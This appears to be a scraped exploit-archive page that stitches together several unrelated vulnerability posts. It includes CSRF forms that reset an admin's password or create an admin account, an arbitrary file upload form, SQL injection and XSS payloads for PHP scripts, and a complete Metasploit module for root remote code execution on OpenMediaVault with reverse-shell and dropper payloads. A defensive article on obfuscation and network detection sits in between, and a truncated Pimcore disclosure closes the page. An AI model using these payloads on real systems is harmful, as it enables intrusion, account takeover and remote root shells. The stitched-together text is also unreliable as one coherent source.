AccPack Cop version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : AccPack Cop v1.0 CSRF Vulnerability                                                                                         |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : http://webpay.com.np/#Product                                                                                               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 5. Set the target site link Save changes and apply . 

[+] infected file : cms/user/modify.php.

[+] http://127.0.0.1/q7.3/cms/user/modify.php.

[+] save code as poc.html 

[+] payload : 

</head>  
<body>  
  <div class="container">  
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>  
    <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST"  enctype="multipart/form-data">  
      <div hidden="true">  
        <input type="text" name="id" id="id" value="1">  
      </div>  
       <div>  
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">  
       </div>  
       <div>  
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">  
       </div>  
       <tr>  
       <div>  
        <label for='status'>Status</label>  
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>  
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>

               </div>     
       <div style='height:80'>  
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>  
       </div>  
    </form>  
  </div>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

AccPack Cop 1.0 Cross Site Request Forgery

How to detect and prevent attackers from using these various techniques
Obfuscation is an important technique for protecting software that also carries risks, especially when used by malware authors. In this article, we examine obfuscation, its effects, and responses to it.
What Is Obfuscation?
Obfuscation is the technique of intentionally making information difficult to read, especially in

**How to detect and prevent attackers from using these various techniques**

Obfuscation is an important technique for protecting software that also carries risks, especially when used by malware authors. In this article, we examine obfuscation, its effects, and responses to it.

**What Is Obfuscation?**

Obfuscation is the technique of intentionally making information difficult to read, especially in computer coding. An important use case is data obfuscation, in which sensitive data is made unrecognizable to protect it from unauthorized access. Various methods are used for this.

For example, only the last four digits of a credit card number are often displayed, while the remaining digits are replaced by Xs or asterisks. In contrast, encryption involves converting data into an unreadable form that can only be decrypted using a special key.

**Obfuscation In Code**

When computer code is obfuscated, complex language and redundant logic are used to make the code difficult to understand. The aim? To deceive both human readers and programs such as decompilers. To do this, parts of the code are encrypted, metadata is removed, or meaningful names are replaced by meaningless ones. Inserting unused or meaningless code is also a common practice to disguise the actual code.

A so-called obfuscator can automate these processes and modify the source code so that it still works but is more difficult to understand.

Other methods of obfuscation include compressing the entire program, making the code unreadable, and changing the control flow to create unstructured, difficult-to-maintain logic.

Inserting dummy code that does not affect the logic or the program's result is also common.

Several techniques are often combined to achieve a multi-layered effect and increase security.

**The Flip Side**

Unfortunately, obfuscation is not only a protection, it is also a challenge. Obfuscation is not only used by legitimate software developers, but also by malicious software authors. The goal of obfuscation is to anonymize cyber attackers, reduce the risk of detection, and hide malware by changing the overall signature and fingerprint of the malicious code – even if the payload is a known threat. The signature is a hash, a unique alphanumeric representation of a malware element. Signatures are very often hashed, but they can also be another short representation of a unique code within a malware element.

Rather than trying to create a new signature by modifying the malware itself, obfuscation focuses on deployment mechanisms to fool antivirus solutions that rely on signatures. Compare this to the use of machine learning, predictive analysis, and artificial intelligence to improve defenses.

Obfuscation, or the disguising of code, can be both "good" and "bad". In the case of "bad" obfuscation, hackers combine various techniques to hide malware and create multiple layers of disguise. One of these techniques is packers. These are software packages that compress malware to hide its presence and make the original code unreadable. Then there are cryptographers who encrypt malware or parts of software to restrict access to code that could alert antivirus programs.

Another method is the insertion of dead code. This involves inserting useless code into the malware to disguise the program's appearance. Attackers can also use command modification, which involves changing the command codes in malware programs. This changes the appearance of the code, but not its behavior.

Obfuscation in the code is, as we have seen, only the first step because no matter how much work the hacker puts into obfuscating the code to bypass EDR, malware must communicate within the network and to the outside world to be "successful". This means that communication must also be obfuscated. In contrast to the past, when networks were scanned quickly, and attempts were immediately made to extract data in the terabyte range at once, attackers today communicate more quietly so that the sensors and switches for the monitoring tools do not strike.

The aim to get IP addresses via scanning, for example, is now followed more slowly to stay under the radar. Reconnaissance, in which the threat actors try to collect data about their targeted victims, e.g. via their network architecture, is also becoming slower and more obscure.

A common obfuscation method is Exclusive OR (XOR). This method hides data in such a way that it can only be read by people who link the code with 0x55 XOR. ROT13 is another trick in which letters are replaced by a code.

****Blasts From The Past:****

*   A well-known example of obfuscation is the SolarWinds attack in 2020. Hackers used obfuscation to bypass defenses and hide their attacks.
*   Another interesting example is PowerShell, a Microsoft Windows tool that attackers are abusing. Malware that uses PowerShell obscures its activities through techniques such as string encoding, command obfuscation, dynamic code execution, and more.
*   Another example is the XLS.HTML attack. Here, hackers used elaborate obfuscation techniques to hide their malicious activities. They changed their encryption methods at least ten times within a year to avoid detection. Their tactics included plain text, escape encoding, Base64 encoding, and even Morse code.
*   In another threat, attackers exploited vulnerabilities in ThinkPHP to execute remote code on servers. They installed a cloaked web shell called "Dama" that allowed permanent access and further attacks.

**Why You Should Not Rely On Signatures Alone**

Signature-based detection is like an old friend–it's reliable when it comes to known threats. But when it comes to new, unknown threats, it can sometimes be in the dark. Here are a few reasons why you shouldn't rely solely on signatures:

1.  Malware authors are true masters of hide and seek. They use various techniques to disguise their malicious programs. Even small changes to the code can cause signature detection to fail.
2.  With polymorphic malware, malware behaves like a chameleon. It constantly changes its structure to avoid detection. Every time it is executed, the code looks different.
3.  Static signatures? Not a chance! Metamorphic malware is even more tricky. It adapts during execution and changes its code dynamically, making it almost impossible to catch with static signatures.
4.  Also, zero-day exploits behave like the "new kid on the block": they are fresh and unknown, and signature-based systems have no chance of recognizing them.
5.  Besides that, when a signature-based solution returns too many false positives, it becomes inefficient. Too many false alerts in daily business affect your security team and waste valuable resources.

In short, signature detection, e.g., in an EDR, is a useful tool, but it's not enough on its own to ward off all threats. A more comprehensive security strategy that also includes behavioral analysis, machine learning, and other modern techniques is essential.

**Why NDR Tools Are So Important**

Anomaly-based IDS solutions are like detectives who keep an eye on a system's normal behavior and sound the alarm when they detect unusual activity. But Network Detection and Response (NDR) tools even go a step further: they constantly adapt to stay one step ahead of the changing cyber threat landscape and offer a significantly higher level of security than traditional signature-based approaches through their advanced analysis and integration. They are able to detect and defend against both known and unknown threats.

****Here's How They Do It:****

*   **Behavioral Analysis:** NDR tools monitor network traffic and analyze behavior. They detect unusual patterns that could indicate command-and-control (C&C) communication, such as irregular data transfers.
*   **Protocol Monitoring:** They examine HTTP requests, DNS traffic, and other protocols to detect suspicious behavior or communication that may be associated with obfuscated malware.
*   **Metadata Analysis:** NDR tools analyze metadata to detect unusual patterns that indicate suspicious activity. Machine learning models help identify typical obfuscation techniques that are visible through suspicious behavior in network traffic.
*   **Long-term Communication Monitoring:** As obfuscating communication is now crucial for hackers, as they adopt slower and stealthier techniques to evade detection and collect data within and outside networks, it is helpful that NDR also looks at longer periods of time, e.g. 3 days, in addition to its ability to perform batch runs, e.g. within minutes, in order to have comparative values and monitor and detect irregularities, and real-time alerting would lead to a large number of alerts if a scan with a ping is detected every minute or so. But is every ping an attack? Certainly not!
*   **Mitre ATT&CK and ZEEK**: These protocols provide valuable insights into threats that use obfuscation. Their integration with NDR tools significantly improves threat detection capabilities.
*   **Threat Data Sharing:** NDR tools share threat data with other security solutions. This enables faster detection of known obfuscation techniques and suspicious behavior. The integration with EDR tools allows them to correlate suspicious activity on endpoints with network traffic, which significantly improves security analysis.

For more on **why NDR is a crucial security tool** and how it detects even the most advanced threats and complex forms of obfuscation, download our whitepaper on Advanced Persistent Threat (APT) detection.

To see how NDR acts in your corporate network, and precisely how it detects and responds to APTs, watch our recorded APT detection video.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Obfuscation: There Are Two Sides To Everything

OpenMediaVault allows an authenticated user to create cron jobs as root on the system. An attacker can abuse this by sending a POST request via rpc.php to schedule and execute a cron entry that runs arbitrary commands as root on the system. All OpenMediaVault versions including the latest release 7.4.2-2 are vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::Deprecated  moved_from 'exploit/multi/http/openmediavault_cmd_exec'  def initialize(info = {})    super(      update_info(        info,        'Name' => 'OpenMediaVault rpc.php Authenticated Cron Remote Code Execution',        'Description' => %q{          OpenMediaVault allows an authenticated user to create cron jobs as root on the system.          An attacker can abuse this by sending a POST request via rpc.php to schedule and execute          a cron entry that runs arbitrary commands as root on the system.          All OpenMediaVault versions including the latest release 7.4.2-2 are vulnerable.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Msf module contributor          'Brandon Perry <bperry.volatile[at]gmail.com>' # Original discovery and first msf module        ],        'References' => [          ['CVE', '2013-3632'],          ['PACKETSTORM', '178526'],          ['URL', 'https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats'],          ['URL', 'https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632']        ],        'DisclosureDate' => '2013-10-30',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }            }          ],          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget', 'curl'],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'WfsDelay' => 65 # wait at least one minute for session to allow cron to execute the payload        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault web application', '/']),        OptString.new('USERNAME', [true, 'The OpenMediaVault username to authenticate with', 'admin']),        OptString.new('PASSWORD', [true, 'The OpenMediaVault password to authenticate with', 'openmediavault']),        OptBool.new('PERSISTENT', [true, 'Keep the payload persistent in Cron. Default value is false, where the payload is removed', false])      ]    )  end  def user    datastore['USERNAME']  end  def pass    datastore['PASSWORD']  end  def rpc_success?(res)    res&.code == 200 && res.body.include?('"error":null')  end  def login(user, pass)    print_status("#{peer} - Authenticating with OpenMediaVault using credentials #{user}:#{pass}")    # try the login options for all OpenMediaVault versions    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'rpc.php'),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => 'application/json',      'data' => {        service: 'Session',        method: 'login',        params: {          username: user,          password: pass        },        options: nil      }.to_json    })    unless res&.code == 200 && res.body.include?('"authenticated":true')      res = send_request_cgi({        'uri' => normalize_uri(target_uri.path, 'rpc.php'),        'method' => 'POST',        'keep_cookies' => true,        'ctype' => 'application/json',        'data' => {          service: 'Authentication',          method: 'login',          params: {            username: user,            password: pass          }        }.to_json      })    end    unless res&.code == 200 && res.body.include?('"authenticated":true')      res = send_request_cgi({        'uri' => normalize_uri(target_uri.path, 'rpc.php'),        'method' => 'POST',        'keep_cookies' => true,        'ctype' => 'application/json',        'data' => {          service: 'Authentication',          method: 'login',          params: [            {              username: user,              password: pass            }          ]        }.to_json      })      return res&.code == 200 && res.body.include?('"authenticated":true')    end    true  end  def check_target    print_status('Trying to detect if target is running a vulnerable version of OpenMediaVault.')    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'rpc.php'),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => 'application/json',      'data' => {        service: 'System',        method: 'getInformation',        params: nil      }.to_json    })    return nil unless rpc_success?(res)    res  end  def check_version(res)    # parse json response and get the version    res_json = res.get_json_document    unless res_json.blank?      # OpenMediaVault v0.3 - v0.5 and up to v4 have different json formats where index 1 has the version information      version = res_json.dig('response', 1, 'value')      version = res_json.dig('response', 'version') if version.nil?      version = res_json.dig('response', 'data', 1, 'value') if version.nil?      return Rex::Version.new(version.split('(')[0].gsub(/[[:space:]]/, '')) unless version.nil? || version.split('(')[0].nil?    end    nil  end  def apply_config_changes    # Apply OpenMediaVault configuration changes    send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'rpc.php'),      'method' => 'POST',      'ctype' => 'application/json',      'keep_cookies' => true,      'data' => {        service: 'Config',        method: 'applyChangesBg',        params: {          modules: [],          force: false        },        options: nil      }.to_json    })  end  def execute_command(cmd, _opts = {})    # OpenMediaFault current release - v6.0.15-1 uses an array definition ['*']    # OpenMediaVault v3.0.16 - v6.0.14-1 uses a string definition '*'    # OpenMediaVault v1.0.22 - v3.0.15 uses a string definition '*' and uuid setting 'undefined'    # OpenMediaVault v0.2.6.4 - v1.0.31 uses a string definition '*' and uuid setting 'undefined' and no execution parameter    # OpenMediaVault < v0.2.6.4 uses a string definition '*' and uuid setting 'undefined', no execution parameter and no everyN parameters    schedule = @version_number >= Rex::Version.new('6.0.15-1') ? ['*'] : '*'    uuid = @version_number <= Rex::Version.new('3.0.15') ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4'    if @version_number > Rex::Version.new('1.0.32')      post_data = {        service: 'Cron',        method: 'set',        params: {          uuid: uuid,          enable: true,          execution: 'exactly',          minute: schedule,          everynminute: false,          hour: schedule,          everynhour: false,          dayofmonth: schedule,          everyndayofmonth: false,          month: schedule,          dayofweek: schedule,          username: 'root',          command: cmd.to_s, # payload          sendemail: false,          comment: '',          type: 'userdefined'        },        options: nil      }.to_json    elsif @version_number >= Rex::Version.new('0.2.6.4')      post_data = {        service: 'Cron',        method: 'set',        params: {          uuid: uuid,          enable: true,          minute: schedule,          everynminute: false,          hour: schedule,          everynhour: false,          dayofmonth: schedule,          everyndayofmonth: false,          month: schedule,          dayofweek: schedule,          username: 'root',          command: cmd.to_s, # payload          sendemail: false,          comment: '',          type: 'userdefined'        }      }.to_json    else      post_data = {        service: 'Cron',        method: 'set',        params: [          {            uuid: uuid,            minute: schedule,            hour: schedule,            dayofmonth: schedule,            month: schedule,            dayofweek: schedule,            username: 'root',            command: cmd.to_s, # payload            comment: '',            type: 'userdefined'          }        ]      }.to_json    end    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'rpc.php'),      'method' => 'POST',      'ctype' => 'application/json',      'keep_cookies' => true,      'data' => post_data    })    fail_with(Failure::Unknown, 'Cannot access cron services to schedule payload execution.') unless rpc_success?(res)    # parse json response and get the uuid of the cron entry    # we need this later to clean up and hide our tracks    res_json = res.get_json_document    @cron_uuid = res_json.dig('response', 'uuid') || ''    # In early versions up to 0.4.x cron uuid does not get returned so try an extra query to get it    if @cron_uuid.blank?      if @version_number >= Rex::Version.new('0.2.6.4')        method = 'getList'      else        method = 'getListByType'      end      post_data = {        service: 'Cron',        method: method,        params: {          start: 0,          limit: -1,          sortfield: nil,          sortdir: nil,          type: ['userdefined']        }      }.to_json      res = send_request_cgi({        'uri' => normalize_uri(target_uri.path, 'rpc.php'),        'method' => 'POST',        'ctype' => 'application/json',        'keep_cookies' => true,        'data' => post_data      })      res_json = res.get_json_document      # get total list of entries and pick the last one      index = res_json.dig('response', 'total')      @cron_uuid = res_json.dig('response', 'data', index - 1, 'uuid') || ''    end    # Apply and update cron configuration to trigger payload execution (1 minute)    # In early releases, you do not have to apply the changes, but the exact release change is unknown, so we always apply    apply_config_changes    print_status('Cron payload execution triggered. Wait at least 1 minute for the session to be established.')  end  def on_new_session(_session)    # try to cleanup cron entry in OpenMediaVault unless PERSISTENT option is true    unless datastore['PERSISTENT']      res = send_request_cgi({        'uri' => normalize_uri(target_uri.path, 'rpc.php'),        'method' => 'POST',        'ctype' => 'application/json',        'keep_cookies' => true,        'data' => {          service: 'Cron',          method: 'delete',          params: {            uuid: @cron_uuid.to_s          }          # options: nil        }.to_json      })      if rpc_success?(res)        # Apply changes and update cron configuration to remove the payload entry        # In early releases, you do not have to apply the changes, but the exact release change is unknown, so we always apply        apply_config_changes        print_good('Cron payload entry successfully removed.')      else        print_warning('Cannot access the cron services to remove the payload entry. If required, remove the entry manually.')      end    end    super  end  def check    @logged_in = login(user, pass)    return CheckCode::Unknown('Failed to authenticate at OpenMediaVault.') unless @logged_in    res = check_target    return CheckCode::Unknown('Can not identify target as OpenMediaVault.') if res.nil?    @version_number = check_version(res)    return CheckCode::Detected('Can not retrieve the version information.') if @version_number.nil?    return CheckCode::Appears("Version #{@version_number}") if @version_number.between?(Rex::Version.new('0.1'), Rex::Version.new('7.4.2-2'))    CheckCode::Detected("Version #{@version_number}")  end  def exploit    unless @logged_in      if login(user, pass)        res = check_target        fail_with(Failure::Unknown, 'Can not identify target as OpenMediaVault.') if res.nil?        @version_number = check_version(res)        if @version_number.nil?          print_status('Can not retrieve version information. Continue anyway...')        else          print_status("Version #{@version_number} detected.")        end      else        fail_with(Failure::NoAccess, 'Failed to authenticate at OpenMediaVault.')      end    end    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

OpenMediaVault rpc.php Authenticated Cron Remote Code Execution

Readymade Real Estate Script suffers from remote blind SQL injection and cross site scripting vulnerabilities.

    [x]========================================================================================================================================[x] | Title        : Readymade Real Estate Script Blind SQL & XSS Vulnerabilities | Software     : Advanced Real Estate Script | Last Update  : 12/07/24 | First Release: 25/01/22 | Vendor       : http://www.i-netsolution.com/ | Date         : 30 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology       : PHP | Database         : MySQL | Price            : $100 | Description      : The real estate market is full of interesting business opportunities. A few years back, it can be said that this industry is hardly responsive to innovation[x]========================================================================================================================================[x][O] Exploit    http://localhost/advance-realestate/search-results.php?Projectmain=&bedrooms=&maxprice=&proj_type=[SQL]&search=r00t&searchtext=&sell_price=111  http://localhost/advance-realestate/search-results.php?Projectmain=&bedrooms=&maxprice=&proj_type=[XSS]&search=r00t&searchtext=&sell_price=111    [O] Proof of concept  [SQL]  Parameter: proj_type (GET)  Type: boolean-based blind  Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)  Payload: Projectmain=&proj_type=%' OR NOT 7852=7852#&searchtext=&sell_price=111&maxprice=&bedrooms=&search=r00t  Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)  Payload: Projectmain=&proj_type=%' AND GTID_SUBSET(CONCAT(0x7162706a71,(SELECT (ELT(7736=7736,1))),0x7178717871),7736) AND 'jCym%'='jCym&searchtext=&sell_price=111&maxprice=&bedrooms=&search=r00t    Type: time-based blind  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  Payload: Projectmain=&proj_type=%' AND (SELECT 6632 FROM (SELECT(SLEEP(5)))NRLb) AND 'IbJm%'='IbJm&searchtext=&sell_price=111&maxprice=&bedrooms=&search=r00t    [XSS]    http://localhost/advance-realestate/advance-realestate/search-results.php?Projectmain=&bedrooms=&maxprice=&proj_type='"><img/src/onerror=.1|alert`HOMODETECTED!!!`+class=VrsHckHomo>&search=r00t&searchtext=&sell_price=111    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

Readymade Real Estate Script SQL Injection / Cross Site Scripting

AMPLE BILLS version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : AMPLE BILLS v1.0 XSS Vulnerability                                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : app/invoice/mpdf/examples/formsubmit.php?1<ScRiPt>prompt(913011)</ScRiPt>[+] http://localhost/ample/app/invoice/mpdf/examples/formsubmit.php?1%3CScRiPt%3Eprompt(913011)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AMPLE BILLS 1.0 Cross Site Scripting

Aero CMS version 0.0.1 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Aero CMS v0.0.1 CSRF Vulnerability                                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://codeload.github.com/MegaTKC/AeroCMS/zip/refs/heads/master                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 9.[+] Set the target site link Save changes and apply . [+] infected file : admin/users.php?source=add_user[+] save code as poc.html .<form action="https://127.0.0.1/pepopecocom/admin/users.php?source=add_user" method="POST">  <div>    <label for="username">Username:</label>    <input type="text" id="username" name="username" required>  </div>  <div>    <label for="password">Password:</label>    <input type="password" id="password" name="password" required>  </div>  <div>    <label for="user_email">Email:</label>    <input type="email" id="user_email" name="user_email" required>  </div>  <div>    <label for="user_first_name">First Name:</label>    <input type="text" id="user_first_name" name="user_first_name" required>  </div>  <div>    <label for="user_last_name">Last Name:</label>    <input type="text" id="user_last_name" name="user_last_name" required>  </div>  <div>    <label for="user_image">Profile Image:</label>    <input type="file" id="user_image" name="user_image">  </div>  <div>    <label for="user_role">User Role:</label>    <select id="user_role" name="user_role" required>      <option value="admin">Admin</option>      <option value="editor">Editor</option>      <option value="subscriber">Subscriber</option>    </select>  </div>  <div>    <button type="submit" name="create_user">Create User</button>  </div></form>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Aero CMS 0.0.1 Cross Site Request Forgery

SchoolPlus LMS version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : SchoolPlus LMS v1.0 SQL injection Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : index.php?project_type_id=1[+] https://www/127.0.0.1/demo/bccnorgnp/projects/index.php?project_type_id=1 <=== inject here[+] Parameter: project_type_id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: project_type_id=1 AND 5604=5604    Type: stacked queries    Title: MySQL < 5.0.12 stacked queries (BENCHMARK - comment)    Payload: project_type_id=1;SELECT BENCHMARK(5000000,MD5(0x45507849))#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: project_type_id=1 AND (SELECT 5053 FROM (SELECT(SLEEP(5)))tLpS)    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: project_type_id=-7152 UNION ALL SELECT NULL,CONCAT(0x717a766271,0x6e496a5078736e466d5662454c5a6a73517278504b4d786866495454786d56417073505956586b70,0x71716a6a71)-- ----Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SchoolPlus LMS 1.0 SQL Injection

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

Posted Jul 31, 2024

Authored by indoushka

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 760d2e5184238b42e8f1ba299d632f9a683af578d5af3fd433dd135eb0ceb06b

Download | Favorite | View

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : AccPack Khanepani v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new file in the list.[+] use payload : cms/gallery/insert.php[+] http://127.0.0.1/jamiatulamanepalorgnp/cms/gallery/insert.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,223)
*   Arbitrary (16,842)
*   BBS (2,859)
*   Bypass (1,855)
*   CGI (1,033)
*   Code Execution (7,784)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,384)
*   DoS (25,024)
*   Encryption (2,389)
*   Exploit (53,098)
*   File Inclusion (4,257)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,885)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (896)
*   Kernel (7,184)
*   Local (14,788)
*   Magazine (586)
*   Overflow (13,165)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,631)
*   Remote (31,625)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,024)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,594)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,921)
*   Web (9,953)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,239)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,580)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,432)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,710)
*   UNIX (9,432)
*   UnixWare (187)
*   Windows (6,668)
*   Other

AccPack Khanepani 1.0 Insecure Direct Object Reference

AccPack Buzz version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : AccPack Buzz v1.0 Remote File Upload Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] use payload : <html><head>  <title>Add</title></head><body>  <div align="center"><form action="http://127.0.0.1/jamiatulamanepalorgp/cms/gallery/insert.php" method="POST"  enctype="multipart/form-data"><table>  <tr>    <td>Image</td><td>      <input type="file" name="image-upload" id="image-upload"></td>   </tr>   <tr>    <td>Status</td><td>      <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>      <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>    </td>   </tr>      <tr style='height:80'>    <td colspan="2"><input type='submit' value='Submit'><input type='reset' Value='Reset'></td>   </tr></table></form></div></body></html>[+] In the seventh line, we change the link to the target link.[+] Link to the uploaded files : cms/image/gallery/[+] The script renames the file to a number, and you always choose numbers starting from the number 9 and above.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Buzz 1.0 Arbitrary File Upload

### Summary

Navigating to `/admin/index/statistics` with a **logged in Pimcore user** (not an XmlHttpRequest because of this check: [IndexController:125](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/IndexController.php#L125C24-L125C40)) exposes information about the Pimcore installation, PHP version, MYSQL version, installed bundles and all database tables and their row count in the system.

> The web server should not return any product and version information of the components used. The table names and row counts should not be exposed.

### Details

`/admin/index/statistics` returns the following JSON-response:
```
{
    {
        "instanceId": "...",
        "pimcore_major_version": 11,
        "pimcore_version": "v11.3.1",
        "pimcore_hash": "3ecd39f21dbdd25ffdf4bec6e2c860eccfd3d008",
        "pimcore_platform_version": "v2024.2",
        "php_version": "8.3.8",
        "mysql_version": "10.11.8-MariaDB-ubu2204",
    "bundles": [
        // all installed bundles
    ],
    "tables": [
        // all tables and their row count, e.g:
        {
            "name": "users",
            "rows": 2
        },
    ]
}
```

Information about the Pimcore Version can also be seen here:

In a current Version:
